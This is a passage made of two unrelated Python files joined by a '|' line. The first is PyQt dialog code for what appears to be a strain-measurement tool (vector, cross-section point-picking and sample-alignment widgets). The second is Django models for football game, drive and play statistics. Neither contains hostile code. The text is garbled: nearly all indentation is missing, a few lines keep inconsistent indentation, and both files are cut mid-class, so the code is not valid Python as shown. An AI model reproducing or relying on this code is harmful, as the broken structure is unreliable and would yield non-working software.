self.main_layout.addSpacing(spacing)
button_layout = QtWidgets.QHBoxLayout()
self.execute_button = QtWidgets.QPushButton(self.title)
self.execute_button.clicked.connect(self.executeButtonClicked)
button_layout.addWidget(self.execute_button)
button_layout.addStretch(1)
self.createKeyInBox()
self.reverse_checkbox = QtWidgets.QCheckBox('Reverse Direction of Vector')
self.main_layout.addWidget(self.reverse_checkbox)
self.main_layout.addSpacing(spacing)
self.main_layout.addLayout(button_layout)
self.main_layout.addStretch(1)
self.setLayout(self.main_layout)
self.parent_model.measurement_points_changed.connect(self.updatePointList)
self.parent_model.measurement_vectors_changed.connect(self.updateAlignment)
self.parent.scenes.rendered_alignment_changed.connect(self.alignment_combobox.setCurrentIndex)
self.setMinimumWidth(450)
def updatePointList(self):
self.points_combobox.clear()
point_list = ['All Points']
point_list.extend(['{}'.format(i+1) for i in range(self.parent_model.measurement_points.size)])
self.points_combobox.addItems(point_list)
def updateAlignment(self):
align_count = self.parent_model.measurement_vectors.shape[2]
if align_count != self.alignment_combobox.count() - 1:
self.alignment_combobox.clear()
alignment_list = ['{}'.format(i + 1) for i in range(align_count)]
alignment_list.append('Add New...')
self.alignment_combobox.addItems(alignment_list)
self.alignment_combobox.setCurrentIndex(self.parent.scenes.rendered_alignment)
def addNewAlignment(self, index):
if index == self.alignment_combobox.count() - 1:
self.alignment_combobox.insertItem(index, '{}'.format(index + 1))
self.alignment_combobox.setCurrentIndex(index)
def changeRenderedAlignment(self, index):
align_count = self.parent_model.measurement_vectors.shape[2]
if 0 <= index < align_count:
self.parent.scenes.changeRenderedAlignment(index)
elif index >= align_count:
self.parent.scenes.changeVisibility(Attributes.Vectors, False)
def toggleKeyInBox(self, selected_text):
strain_component = StrainComponents(selected_text)
if strain_component == StrainComponents.custom:
self.key_in_box.setVisible(True)
self.form_group.validateGroup()
else:
self.key_in_box.setVisible(False)
self.execute_button.setEnabled(True)
def createKeyInBox(self):
self.key_in_box = QtWidgets.QWidget(self)
layout = QtWidgets.QVBoxLayout()
self.form_group = FormGroup(FormGroup.Layout.Horizontal)
self.x_axis = FormControl('X', 1.0, required=True, number=True, decimals=7)
self.x_axis.range(-1.0, 1.0)
self.y_axis = FormControl('Y', 0.0, required=True, number=True, decimals=7)
self.y_axis.range(-1.0, 1.0)
self.z_axis = FormControl('Z', 0.0, required=True, number=True, decimals=7)
self.z_axis.range(-1.0, 1.0)
self.form_group.addControl(self.x_axis)
self.form_group.addControl(self.y_axis)
self.form_group.addControl(self.z_axis)
self.form_group.groupValidation.connect(self.formValidation)
layout.addWidget(self.form_group)
self.key_in_box.setLayout(layout)
self.main_layout.addWidget(self.key_in_box)
self.toggleKeyInBox(self.component_combobox.currentText())
def formValidation(self, is_valid):
self.execute_button.setDisabled(True)
if is_valid:
if np.linalg.norm([self.x_axis.value, self.y_axis.value, self.z_axis.value]) > VECTOR_EPS:
self.execute_button.setEnabled(True)
else:
self.x_axis.validation_label.setText('Bad Normal')
def executeButtonClicked(self):
points = self.points_combobox.currentIndex() - 1
selected_text = self.component_combobox.currentText()
strain_component = StrainComponents(selected_text)
alignment = self.alignment_combobox.currentIndex()
detector = self.detector_combobox.currentIndex()
check_state = self.reverse_checkbox.checkState()
reverse = True if check_state == QtCore.Qt.Checked else False
if strain_component == StrainComponents.custom:
vector = [self.x_axis.value, self.y_axis.value, self.z_axis.value]
else:
vector = None
self.parent.presenter.addVectors(points, strain_component, alignment, detector,
key_in=vector, reverse=reverse)
# New vectors are drawn by the scene manager after function ends
self.parent.scenes._rendered_alignment = alignment
def closeEvent(self, event):
self.parent.scenes.changeRenderedAlignment(0)
event.accept()
class PickPointDialog(QtWidgets.QWidget):
"""Provides UI for selecting measurement points on a cross section of the sample
:param parent: Main window
:type parent: MainWindow
"""
dock_flag = DockFlag.Full
def __init__(self, parent):
super().__init__(parent)
self.parent = parent
self.parent_model = parent.presenter.model
self.parent.scenes.switchToSampleScene()
self.title = 'Add Measurement Points Graphically'
self.setMinimumWidth(500)
self.plane_offset_range = (-1., 1.)
self.slider_range = (-10000000, 10000000)
self.sample_scale = 20
self.path_pen = QtGui.QPen(QtGui.QColor(255, 0, 0), 0)
self.point_pen = QtGui.QPen(QtGui.QColor(200, 0, 0), 0)
self.main_layout = QtWidgets.QVBoxLayout()
self.setLayout(self.main_layout)
button_layout = QtWidgets.QHBoxLayout()
self.help_button = create_tool_button(tooltip='Help', style_name='ToolButton',
status_tip='Display shortcuts for the cross-section view',
icon_path=path_for('question.png'))
self.help_button.clicked.connect(self.showHelp)
self.reset_button = create_tool_button(tooltip='Reset View', style_name='ToolButton',
status_tip='Reset camera transformation of the cross-section view',
icon_path=path_for('refresh.png'))
self.execute_button = QtWidgets.QPushButton('Add Points')
self.execute_button.clicked.connect(self.addPoints)
button_layout.addWidget(self.help_button)
button_layout.addWidget(self.reset_button)
button_layout.addStretch(1)
button_layout.addWidget(self.execute_button)
self.main_layout.addLayout(button_layout)
self.splitter = QtWidgets.QSplitter(QtCore.Qt.Vertical)
self.splitter.setChildrenCollapsible(False)
self.main_layout.addWidget(self.splitter)
self.createGraphicsView()
self.reset_button.clicked.connect(self.view.reset)
self.createControlPanel()
self.prepareMesh()
self.parent_model.sample_changed.connect(self.prepareMesh)
self.parent_model.measurement_points_changed.connect(self.updateCrossSection)
self.initializing = True
def showEvent(self, event):
if self.initializing:
self.view.fitInView(self.view.anchor, QtCore.Qt.KeepAspectRatio)
self.initializing = False
super().showEvent(event)
def closeEvent(self, event):
self.parent.scenes.removePlane()
event.accept()
def prepareMesh(self):
self.mesh = None
samples = self.parent_model.sample
for _, sample in samples.items():
if self.mesh is None:
self.mesh = sample.copy()
else:
self.mesh.append(sample)
self.scene.clear()
self.tabs.setEnabled(self.mesh is not None)
if self.mesh is not None:
self.setPlane(self.plane_combobox.currentText())
else:
self.parent.scenes.removePlane()
self.view.reset()
def updateStatusBar(self, point):
if self.view.rect().contains(point):
transform = self.view.scene_transform.inverted()[0]
scene_pt = transform.map(self.view.mapToScene(point)) / self.sample_scale
world_pt = [scene_pt.x(), scene_pt.y(), -self.old_distance] @ self.matrix.transpose()
cursor_text = f'X: {world_pt[0]:.3f} Y: {world_pt[1]:.3f} Z: {world_pt[2]:.3f}'
self.parent.cursor_label.setText(cursor_text)
else:
self.parent.cursor_label.clear()
def createGraphicsView(self):
self.scene = GraphicsScene(self.sample_scale, self)
self.view = GraphicsView(self.scene)
self.view.mouse_moved.connect(self.updateStatusBar)
self.view.setMinimumHeight(350)
self.splitter.addWidget(self.view)
def createControlPanel(self):
self.tabs = QtWidgets.QTabWidget()
self.tabs.setMinimumHeight(250)
self.tabs.setTabPosition(QtWidgets.QTabWidget.South)
self.splitter.addWidget(self.tabs)
self.createPlaneTab()
self.createSelectionToolsTab()
self.createGridOptionsTab()
point_manager = PointManager(PointType.Measurement, self.parent)
self.tabs.addTab(create_scroll_area(point_manager), 'Point Manager')
def createPlaneTab(self):
layout = QtWidgets.QVBoxLayout()
layout.addWidget(QtWidgets.QLabel('Specify Plane:'))
self.plane_combobox = QtWidgets.QComboBox()
self.plane_combobox.setView(QtWidgets.QListView())
self.plane_combobox.addItems([p.value for p in PlaneOptions])
self.plane_combobox.currentTextChanged.connect(self.setPlane)
self.createCustomPlaneBox()
layout.addWidget(self.plane_combobox)
layout.addWidget(self.custom_plane_widget)
layout.addSpacing(20)
slider_layout = QtWidgets.QHBoxLayout()
slider_layout.addWidget(QtWidgets.QLabel('Plane Distance from Origin (mm):'))
self.plane_lineedit = QtWidgets.QLineEdit()
validator = QtGui.QDoubleValidator(self.plane_lineedit)
validator.setNotation(QtGui.QDoubleValidator.StandardNotation)
validator.setDecimals(3)
self.plane_lineedit.setValidator(validator)
self.plane_lineedit.textEdited.connect(self.updateSlider)
self.plane_lineedit.editingFinished.connect(self.movePlane)
slider_layout.addStretch(1)
slider_layout.addWidget(self.plane_lineedit)
layout.addLayout(slider_layout)
self.plane_slider = QtWidgets.QSlider(QtCore.Qt.Horizontal)
self.plane_slider.setMinimum(self.slider_range[0])
self.plane_slider.setMaximum(self.slider_range[1])
self.plane_slider.setFocusPolicy(QtCore.Qt.StrongFocus)
self.plane_slider.setSingleStep(1)
self.plane_slider.sliderMoved.connect(self.updateLineEdit)
self.plane_slider.sliderReleased.connect(self.movePlane)
layout.addWidget(self.plane_slider)
layout.addStretch(1)
plane_tab = QtWidgets.QWidget()
plane_tab.setLayout(layout)
self.tabs.addTab(create_scroll_area(plane_tab), 'Define Plane')
def createSelectionToolsTab(self):
layout = QtWidgets.QVBoxLayout()
selector_layout = QtWidgets.QHBoxLayout()
selector_layout.addWidget(QtWidgets.QLabel('Select Geometry of Points: '))
self.button_group = QtWidgets.QButtonGroup()
self.button_group.buttonClicked[int].connect(self.changeSceneMode)
self.object_selector = create_tool_button(checkable=True, checked=True, tooltip='Select Points',
status_tip='Select movable points from the cross-section view',
style_name='MidToolButton', icon_path=path_for('select.png'))
self.point_selector = create_tool_button(checkable=True, tooltip='Draw a Point',
status_tip='Draw a single point at the selected position',
style_name='MidToolButton', icon_path=path_for('point.png'))
self.line_selector = create_tool_button(checkable=True, tooltip='Draw Points on Line',
status_tip='Draw equally spaced points on the selected line',
style_name='MidToolButton', icon_path=path_for('line_tool.png'))
self.area_selector = create_tool_button(checkable=True, tooltip='Draw Points on Area',
status_tip='Draw a grid of points on the selected area',
style_name='MidToolButton', icon_path=path_for('area_tool.png'))
self.button_group.addButton(self.object_selector, GraphicsScene.Mode.Select.value)
self.button_group.addButton(self.point_selector, GraphicsScene.Mode.Draw_point.value)
self.button_group.addButton(self.line_selector, GraphicsScene.Mode.Draw_line.value)
self.button_group.addButton(self.area_selector, GraphicsScene.Mode.Draw_area.value)
selector_layout.addWidget(self.object_selector)
selector_layout.addWidget(self.point_selector)
selector_layout.addWidget(self.line_selector)
selector_layout.addWidget(self.area_selector)
selector_layout.addStretch(1)
self.createLineToolWidget()
self.createAreaToolWidget()
layout.addLayout(selector_layout)
layout.addWidget(self.line_tool_widget)
layout.addWidget(self.area_tool_widget)
layout.addStretch(1)
select_tab = QtWidgets.QWidget()
select_tab.setLayout(layout)
self.tabs.addTab(create_scroll_area(select_tab), 'Selection Tools')
def createGridOptionsTab(self):
layout = QtWidgets.QVBoxLayout()
self.show_grid_checkbox = QtWidgets.QCheckBox('Show Grid')
self.show_grid_checkbox.stateChanged.connect(self.showGrid)
self.snap_to_grid_checkbox = QtWidgets.QCheckBox('Snap Selection to Grid')
self.snap_to_grid_checkbox.stateChanged.connect(self.snapToGrid)
self.snap_to_grid_checkbox.setEnabled(self.view.show_grid)
layout.addWidget(self.show_grid_checkbox)
layout.addWidget(self.snap_to_grid_checkbox)
self.createGridWidget()
layout.addWidget(self.grid_widget)
layout.addStretch(1)
grid_tab = QtWidgets.QWidget()
grid_tab.setLayout(layout)
self.tabs.addTab(create_scroll_area(grid_tab), 'Grid Options')
def createCustomPlaneBox(self):
self.custom_plane_widget = QtWidgets.QWidget(self)
layout = QtWidgets.QVBoxLayout()
self.form_group = FormGroup(FormGroup.Layout.Horizontal)
self.x_axis = FormControl('X', 1.0, required=True, number=True)
self.x_axis.range(-1.0, 1.0)
self.y_axis = FormControl('Y', 0.0, required=True, number=True)
self.y_axis.range(-1.0, 1.0)
self.z_axis = FormControl('Z', 0.0, required=True, number=True)
self.z_axis.range(-1.0, 1.0)
self.form_group.addControl(self.x_axis)
self.form_group.addControl(self.y_axis)
self.form_group.addControl(self.z_axis)
self.form_group.groupValidation.connect(self.setCustomPlane)
layout.addWidget(self.form_group)
self.custom_plane_widget.setLayout(layout)
def createLineToolWidget(self):
self.line_tool_widget = QtWidgets.QWidget(self)
layout = QtWidgets.QHBoxLayout()
layout.setContentsMargins(0, 20, 0, 0)
layout.addWidget(QtWidgets.QLabel('Number of Points: '))
self.line_point_count_spinbox = QtWidgets.QSpinBox()
self.line_point_count_spinbox.setValue(self.scene.line_tool_size)
self.line_point_count_spinbox.setRange(2, 100)
self.line_point_count_spinbox.valueChanged.connect(self.scene.setLineToolSize)
layout.addWidget(self.line_point_count_spinbox)
self.line_tool_widget.setVisible(False)
self.line_tool_widget.setLayout(layout)
def createAreaToolWidget(self):
self.area_tool_widget = QtWidgets.QWidget(self)
layout = QtWidgets.QHBoxLayout()
layout.setContentsMargins(0, 20, 0, 0)
layout.addWidget(QtWidgets.QLabel('Number of Points: '))
self.area_x_spinbox = QtWidgets.QSpinBox()
self.area_x_spinbox.setValue(self.scene.area_tool_size[0])
self.area_x_spinbox.setRange(2, 100)
self.area_y_spinbox = QtWidgets.QSpinBox()
self.area_y_spinbox.setValue(self.scene.area_tool_size[1])
self.area_y_spinbox.setRange(2, 100)
stretch_factor = 3
layout.addStretch(1)
layout.addWidget(QtWidgets.QLabel('X: '))
self.area_x_spinbox.valueChanged.connect(lambda: self.scene.setAreaToolSize(self.area_x_spinbox.value(),
self.area_y_spinbox.value()))
layout.addWidget(self.area_x_spinbox, stretch_factor)
layout.addStretch(1)
layout.addWidget(QtWidgets.QLabel('Y: '))
self.area_y_spinbox.valueChanged.connect(lambda: self.scene.setAreaToolSize(self.area_x_spinbox.value(),
self.area_y_spinbox.value()))
layout.addWidget(self.area_y_spinbox, stretch_factor)
self.area_tool_widget.setVisible(False)
self.area_tool_widget.setLayout(layout)
def createGridWidget(self):
self.grid_widget = QtWidgets.QWidget(self)
main_layout = QtWidgets.QVBoxLayout()
main_layout.setContentsMargins(0, 20, 0, 0)
layout = QtWidgets.QHBoxLayout()
layout.addWidget(QtWidgets.QLabel('Grid Type: '))
grid_combobox = QtWidgets.QComboBox()
grid_combobox.setView(QtWidgets.QListView())
grid_combobox.addItems([g.value for g in Grid.Type])
grid_combobox.currentTextChanged.connect(lambda value: self.setGridType(Grid.Type(value)))
layout.addWidget(grid_combobox)
main_layout.addLayout(layout)
main_layout.addSpacing(20)
layout = QtWidgets.QHBoxLayout()
layout.addWidget(QtWidgets.QLabel('Grid Size: '))
self.grid_x_label = QtWidgets.QLabel('')
self.grid_x_spinbox = QtWidgets.QDoubleSpinBox()
self.grid_x_spinbox.setDecimals(1)
self.grid_x_spinbox.setSingleStep(0.1)
self.grid_x_spinbox.valueChanged.connect(self.changeGridSize)
self.grid_y_label = QtWidgets.QLabel('')
self.grid_y_spinbox = QtWidgets.QDoubleSpinBox()
self.grid_y_spinbox.setDecimals(1)
self.grid_y_spinbox.setSingleStep(0.1)
self.grid_y_spinbox.valueChanged.connect(self.changeGridSize)
stretch_factor = 3
layout.addStretch(1)
layout.addWidget(self.grid_x_label)
layout.addWidget(self.grid_x_spinbox, stretch_factor)
layout.addStretch(1)
layout.addWidget(self.grid_y_label)
layout.addWidget(self.grid_y_spinbox, stretch_factor)
main_layout.addLayout(layout)
self.setGridType(self.view.grid.type)
self.grid_widget.setVisible(False)
self.grid_widget.setLayout(main_layout)
def changeGridSize(self):
grid_x = int(self.grid_x_spinbox.value() * self.sample_scale)
if self.view.grid.type == Grid.Type.Box:
    grid_y = int(self.grid_y_spinbox.value() * self.sample_scale)
else:
    # polar grid: the second value is an angle in degrees and is not scaled
    grid_y = self.grid_y_spinbox.value()
self.view.setGridSize((grid_x, grid_y))
def setGridType(self, grid_type):
self.view.setGridType(grid_type)
size = self.view.grid.size
if grid_type == Grid.Type.Box:
self.grid_x_label.setText('X (mm): ')
self.grid_y_label.setText('Y (mm): ')
self.grid_x_spinbox.setValue(size[0])
self.grid_y_spinbox.setValue(size[1])
self.grid_x_spinbox.setRange(0.1, 1000)
self.grid_y_spinbox.setRange(0.1, 1000)
else:
self.grid_x_label.setText('Radius (mm): ')
self.grid_y_label.setText('Angle (degree): ')
self.grid_x_spinbox.setValue(size[0])
self.grid_y_spinbox.setValue(size[1])
self.grid_x_spinbox.setRange(0.1, 1000)
self.grid_y_spinbox.setRange(0.1, 360)
def changeSceneMode(self, button_id):
self.scene.mode = GraphicsScene.Mode(button_id)
self.line_tool_widget.setVisible(self.scene.mode == GraphicsScene.Mode.Draw_line)
self.area_tool_widget.setVisible(self.scene.mode == GraphicsScene.Mode.Draw_area)
def showHelp(self):
self.view.show_help = not self.view.has_foreground
self.scene.update()
def showGrid(self, state):
self.view.show_grid = (state == QtCore.Qt.Checked)
self.snap_to_grid_checkbox.setEnabled(self.view.show_grid)
self.grid_widget.setVisible(self.view.show_grid)
self.scene.update()
def snapToGrid(self, state):
self.view.snap_to_grid = (state == QtCore.Qt.Checked)
def updateSlider(self, value):
if not self.plane_lineedit.hasAcceptableInput():
return
new_distance = clamp(float(value), *self.plane_offset_range)
slider_value = int(map_range(*self.plane_offset_range, *self.slider_range, new_distance))
self.plane_slider.setValue(slider_value)
offset = new_distance - self.old_distance
self.parent.scenes.drawPlane(shift_by=offset * self.plane.normal)
self.old_distance = new_distance
def updateLineEdit(self, value):
new_distance = trunc(map_range(*self.slider_range, *self.plane_offset_range, value), 3)
self.plane_lineedit.setText('{:.3f}'.format(new_distance))
offset = new_distance - self.old_distance
self.parent.scenes.drawPlane(shift_by=offset * self.plane.normal)
self.old_distance = new_distance
def movePlane(self):
distance = clamp(float(self.plane_lineedit.text()), *self.plane_offset_range)
self.plane_lineedit.setText('{:.3f}'.format(distance))
point = distance * self.plane.normal
self.plane = Plane(self.plane.normal, point)
self.updateCrossSection()
def setCustomPlane(self, is_valid):
if is_valid:
normal = np.array([self.x_axis.value, self.y_axis.value, self.z_axis.value])
try:
self.initializePlane(normal, self.mesh.bounding_box.center)
except ValueError:
self.x_axis.validation_label.setText('Bad Normal')
def setPlane(self, selected_text):
if selected_text == PlaneOptions.Custom.value:
self.custom_plane_widget.setVisible(True)
self.form_group.validateGroup()
return
else:
self.custom_plane_widget.setVisible(False)
if selected_text == PlaneOptions.XY.value:
plane_normal = np.array([0., 0., 1.])
elif selected_text == PlaneOptions.XZ.value:
plane_normal = np.array([0., 1., 0.])
else:
plane_normal = np.array([1., 0., 0.])
self.initializePlane(plane_normal, self.mesh.bounding_box.center)
def initializePlane(self, plane_normal, plane_point):
self.plane = Plane(plane_normal, plane_point)
plane_size = self.mesh.bounding_box.radius
self.parent.scenes.drawPlane(self.plane, 2 * plane_size, 2 * plane_size)
distance = self.plane.distanceFromOrigin()
self.plane_offset_range = (distance - plane_size, distance + plane_size)
slider_value = int(map_range(*self.plane_offset_range, *self.slider_range, distance))
self.plane_slider.setValue(slider_value)
self.plane_lineedit.setText('{:.3f}'.format(distance))
self.old_distance = distance
# invert the normal so that the y-axis of the cross-section view is flipped
self.matrix = self.__lookAt(-Vector3(self.plane.normal))
self.view.resetTransform()
self.updateCrossSection()
def updateCrossSection(self):
self.scene.clear()
segments = mesh_plane_intersection(self.mesh, self.plane)
if len(segments) == 0:
return
segments = np.array(segments)
item = QtWidgets.QGraphicsPathItem()
cross_section_path = QtGui.QPainterPath()
rotated_segments = self.sample_scale * (segments @ self.matrix)
for i in range(0, rotated_segments.shape[0], 2):
start = rotated_segments[i, :]
cross_section_path.moveTo(start[0], start[1])
end = rotated_segments[i + 1, :]
cross_section_path.lineTo(end[0], end[1])
item.setPath(cross_section_path)
item.setPen(self.path_pen)
item.setTransform(self.view.scene_transform)
self.scene.addItem(item)
rect = item.boundingRect()
anchor = rect.center()
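# keep only measurement points that lie on the cross-section plane: d holds
# the signed distance of each point from the plane along its normal, and
# points within VECTOR_EPS of zero are selected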
ab = self.plane.point - self.parent_model.measurement_points.points
d = np.einsum('ij,ij->i', np.expand_dims(self.plane.normal, axis=0), ab)
index = np.where(np.abs(d) < VECTOR_EPS)[0]
rotated_points = self.parent_model.measurement_points.points[index, :]
rotated_points = rotated_points @ self.matrix
for i, p in zip(index, rotated_points):
point = QtCore.QPointF(p[0], p[1]) * self.sample_scale
point = self.view.scene_transform.map(point)
item = GraphicsPointItem(point, size=self.scene.point_size)
item.setToolTip(f'Point {i + 1}')
item.fixed = True
item.makeControllable(self.scene.mode == GraphicsScene.Mode.Select)
item.setPen(self.point_pen)
self.scene.addItem(item)
rect = rect.united(item.boundingRect().translated(point))
# calculate new rectangle that encloses original rect with a different anchor
rect = rect.united(rect.translated(anchor - rect.center()))
self.view.setSceneRect(rect)
self.view.fitInView(rect, QtCore.Qt.KeepAspectRatio)
self.view.anchor = rect
@staticmethod
def __lookAt(forward):
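# Builds a rotation matrix whose columns (c1, c2, c3) form an orthonormal
# basis (left, up, forward); '^' is used here as the Vector3 cross product.
# The initial up vector is picked so that it is never parallel to forward.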
rot_matrix = Matrix33.identity()
up = Vector3([0., -1., 0.]) if -VECTOR_EPS < forward[1] < VECTOR_EPS else Vector3([0., 0., 1.])
left = up ^ forward
left.normalize()
up = forward ^ left
rot_matrix.c1[:3] = left
rot_matrix.c2[:3] = up
rot_matrix.c3[:3] = forward
return rot_matrix
def addPoints(self):
if len(self.scene.items()) < 2:
return
points_2d = []
transform = self.view.scene_transform.inverted()[0]
for item in self.scene.items():
if isinstance(item, GraphicsPointItem) and not item.fixed:
pos = transform.map(item.pos()) / self.sample_scale
# negate distance due to inverted normal when creating matrix
points_2d.append([pos.x(), pos.y(), -self.old_distance])
self.scene.removeItem(item)
if not points_2d:
return
points = points_2d[::-1] @ self.matrix.transpose()
enabled = [True] * points.shape[0]
self.parent.presenter.addPoints(list(zip(points, enabled)), PointType.Measurement, False)
class AlignSample(QtWidgets.QWidget):
"""Provides UI for aligning sample on instrument with 6D pose
:param parent: Main window
:type parent: MainWindow
"""
dock_flag = DockFlag.Upper
def __init__(self, parent):
super().__init__(parent)
self.parent = parent
self.parent.scenes.switchToInstrumentScene()
self.title = 'Align Sample with 6D pose'
self.setMinimumWidth(450)
self.main_layout = QtWidgets.QVBoxLayout()
self.setLayout(self.main_layout)
self.main_layout.addSpacing(20)
self.main_layout.addWidget(FormTitle('Create Transformation for Alignment'))
self.main_layout.addSpacing(10)
self.main_layout.addWidget(QtWidgets.QLabel('Translation along the X, Y, and Z axis (mm):'))
self.position_form_group = FormGroup(FormGroup.Layout.Horizontal)
self.x_position = FormControl('X', 0.0, required=True, number=True)
self.y_position = FormControl('Y', 0.0, required=True, number=True)
self.z_position = FormControl('Z', 0.0, required=True, number=True)
self.position_form_group.addControl(self.x_position)
self.position_form_group.addControl(self.y_position)
self.position_form_group.addControl(self.z_position)
self.position_form_group.groupValidation.connect(self.formValidation)
self.main_layout.addWidget(self.position_form_group)
self.main_layout.addWidget(QtWidgets.QLabel('Rotation around the X, Y, and Z axis (degrees):'))
self.orientation_form_group = FormGroup(FormGroup.Layout.Horizontal)
self.x_rotation = FormControl('X', 0.0, required=True, number=True)
self.x_rotation.range(-360.0, 360.0)
self.y_rotation = FormControl('Y', 0.0, required=True, number=True)
self.y_rotation.range(-360.0, 360.0)
self.z_rotation = FormControl('Z', 0.0, required=True, number=True)
self.z_rotation.range(-360.0, 360.0)
self.orientation_form_group.addControl(self.x_rotation)
self.orientation_form_group.addControl(self.y_rotation)
self.orientation_form_group.addControl(self.z_rotation)
self.orientation_form_group.groupValidation.connect(self.formValidation)
self.main_layout.addWidget(self.orientation_form_group)
button_layout = QtWidgets.QHBoxLayout()
self.execute_button = QtWidgets.QPushButton('Align Sample')
self.execute_button.clicked.connect(self.executeButtonClicked)
button_layout.addWidget(self.execute_button)
button_layout.addStretch(1)
self.main_layout.addLayout(button_layout)
self.main_layout.addStretch(1)
def formValidation(self):
valid = self.position_form_group.valid and self.orientation_form_group.valid
self.execute_button.setEnabled(valid)
def executeButtonClicked(self):
pose = [self.x_position.value, self.y_position.value, self.z_position.value,
self.x_rotation.value, self.y_rotation.value, self.z_rotation.value]
self.parent.presenter.alignSampleWithPose(pose)
|
# -*- coding: utf-8 -*-
import os
import datetime
import pytz
from django.db import models
from django.contrib.auth.models import User
from common.current_week import get_current_week
from common.hashing import generate_hash, compare_hash
def get_safe(model_name, **kwargs):
# a modified get() function that returns a single matching object if one exists
# or None otherwise (doesn't raise an Exception)
models = {'Game': Game, 'Player': Player, 'Team': Team, 'League': League,
'LeagueStat': LeagueStat, 'Lineup': Lineup, 'Member': Member,
'StatCondition': StatCondition, 'User': User}
model = models[model_name]
data = model.objects.filter(**kwargs)
if len(data) == 1:
return data[0]
else:
return None
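# Illustrative usage (model name and filter are examples only):
#   team = get_safe('Team', team_id='NE')
#   -> a Team instance, or None when zero or multiple rows match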
class SeasonType(models.TextChoices):
PRE = 'PRE'
REG = 'REG'
PRO = 'PRO'
POST = 'POST'
class Game(models.Model):
game_id = models.CharField(primary_key=True, max_length=36)
start_time = models.DateTimeField()
season_type = models.CharField(max_length=4, choices=SeasonType.choices)
season_year = models.SmallIntegerField()
week = models.SmallIntegerField()
phase = models.TextField(null=True)
attendance = models.IntegerField(null=True)
stadium = models.TextField(null=True)
home_score = models.SmallIntegerField(null=True, default=0)
home_score_q1 = models.SmallIntegerField(null=True, default=0)
home_score_q2 = models.SmallIntegerField(null=True, default=0)
home_score_q3 = models.SmallIntegerField(null=True, default=0)
home_score_q4 = models.SmallIntegerField(null=True, default=0)
home_score_ot = models.SmallIntegerField(null=True, default=0)
away_score = models.SmallIntegerField(null=True, default=0)
away_score_q1 = models.SmallIntegerField(null=True, default=0)
away_score_q2 = models.SmallIntegerField(null=True, default=0)
away_score_q3 = models.SmallIntegerField(null=True, default=0)
away_score_q4 = models.SmallIntegerField(null=True, default=0)
away_score_ot = models.SmallIntegerField(null=True, default=0)
home_team = models.ForeignKey('Team', models.DO_NOTHING, db_column='home_team',
related_name='home_team')
away_team = models.ForeignKey('Team', models.DO_NOTHING, db_column='away_team',
related_name='away_team')
weather = models.TextField(null=True)
modified_at = models.DateTimeField(auto_now=True)
def __repr__(self):
return f"{{'model': 'Game', 'game_id': '{self.game_id}'}}"
def __str__(self):
return f"{{Game '{self.game_id}'}}"
def __eq__(self, other):
if isinstance(other, Game):
return (self.game_id == other.game_id)
else:
return NotImplemented
def __hash__(self):
return hash(('Game', self.game_id))
def data_dict(self):
return {'id': self.game_id,
        'start_time': self.start_time.strftime("%Y-%m-%d %H:%M"),
        'season_type': self.season_type, 'season_year': self.season_year,
        'week': self.week, 'home_team': self.home_team.team_id,
        'away_team': self.away_team.team_id, 'home_score': self.home_score,
        'away_score': self.away_score}
class Drive(models.Model):
game = models.ForeignKey('Game', models.CASCADE)
drive_id = models.SmallIntegerField()
start_quarter = models.SmallIntegerField(null=True)
end_quarter = models.SmallIntegerField(null=True)
start_transition = models.TextField(null=True)
end_transition = models.TextField(null=True)
start_field = models.TextField(null=True)
end_field = models.TextField(null=True)
start_time = models.TextField(null=True)
end_time = models.TextField(null=True)
pos_team = models.ForeignKey('Team', models.DO_NOTHING)
pos_time = models.TextField(null=True)
first_downs = models.SmallIntegerField(null=True)
penalty_yards = models.SmallIntegerField(null=True)
yards_gained = models.SmallIntegerField(null=True)
play_count = models.SmallIntegerField(null=True)
def __repr__(self):
return (f"{{'model': 'Drive', 'game_id': '{self.game.game_id}', "
f"'drive_id': {self.drive_id}}}")
def __str__(self):
return f"{{Drive {self.drive_id} from Game '{self.game.game_id}'}}"
def __eq__(self, other):
if isinstance(other, Drive):
return (self.id == other.id)
else:
return NotImplemented
def __hash__(self):
return hash(('Drive', self.id))
class Play(models.Model):
drive = models.ForeignKey('Drive', models.CASCADE)
play_id = models.SmallIntegerField()
time = models.TextField(null=True)
down = models.SmallIntegerField(null=True)
start_yardline = models.TextField(null=True)
end_yardline = models.TextField(null=True)
first_down = models.BooleanField(null=True)
penalty = models.BooleanField(null=True)
description = models.TextField(null=True)
play_type = models.TextField(null=True)
pos_team = models.ForeignKey('Team', models.DO_NOTHING, db_column='pos_team')
quarter = models.SmallIntegerField(null=True)
yards_to_go = models.SmallIntegerField(null=True)
def __repr__(self):
return (f"{{'model': 'Play', 'game_id': '{self.drive.game.game_id}', "
f"'drive_id': {self.drive.drive_id}, 'play_id': {self.play_id}}}")
def __str__(self):
return (f"{{Play {self.play_id} from Drive {self.drive.drive_id} from Game "
f"'{self.drive.game.game_id}'}}")
def __eq__(self, other):
if isinstance(other, Play):
return (self.id == other.id)
else:
return NotImplemented
def __hash__(self):
return hash(('Play', self.id))
class PlayPlayer(models.Model):
play = models.ForeignKey('Play', models.CASCADE)
player = models.ForeignKey('Player', models.DO_NOTHING)
team = models.ForeignKey('Team', models.DO_NOTHING, db_column='team')
defense_ast = models.SmallIntegerField(default=0)
defense_ffum = models.SmallIntegerField(default=0)
defense_fgblk = models.SmallIntegerField(default=0)
defense_frec = models.SmallIntegerField(default=0)
defense_frec_tds = models.SmallIntegerField(default=0)
defense_frec_yds = models.SmallIntegerField(default=0)
defense_int = models.SmallIntegerField(default=0)
defense_int_tds = models.SmallIntegerField(default=0)
defense_int_yds = models.SmallIntegerField(default=0)
defense_misc_tds = models.SmallIntegerField(default=0)
defense_misc_yds = models.SmallIntegerField(default=0)
defense_pass_def = models.SmallIntegerField(default=0)
defense_puntblk = models.SmallIntegerField(default=0)
defense_qbhit = models.SmallIntegerField(default=0)
defense_safe = models.SmallIntegerField(default=0)
defense_sk = models.FloatField(default=0)
defense_sk_yds = models.SmallIntegerField(default=0)
defense_tds = models.SmallIntegerField(default=0)
defense_tkl = models.SmallIntegerField(default=0)
defense_tkl_loss = models.SmallIntegerField(default=0)
defense_tkl_loss_yds = models.SmallIntegerField(default=0)
defense_tkl_primary = models.SmallIntegerField(default=0)
defense_xpblk = models.SmallIntegerField(default=0)
first_down = models.SmallIntegerField(default=0)
fourth_down_att = models.SmallIntegerField(default=0)
fourth_down_conv = models.SmallIntegerField(default=0)
fourth_down_failed = models.SmallIntegerField(default=0)
fumbles_forced = models.SmallIntegerField(default=0)
fumbles_lost = models.SmallIntegerField(default=0)
fumbles_notforced = models.SmallIntegerField(default=0)
fumbles_oob = models.SmallIntegerField(default=0)
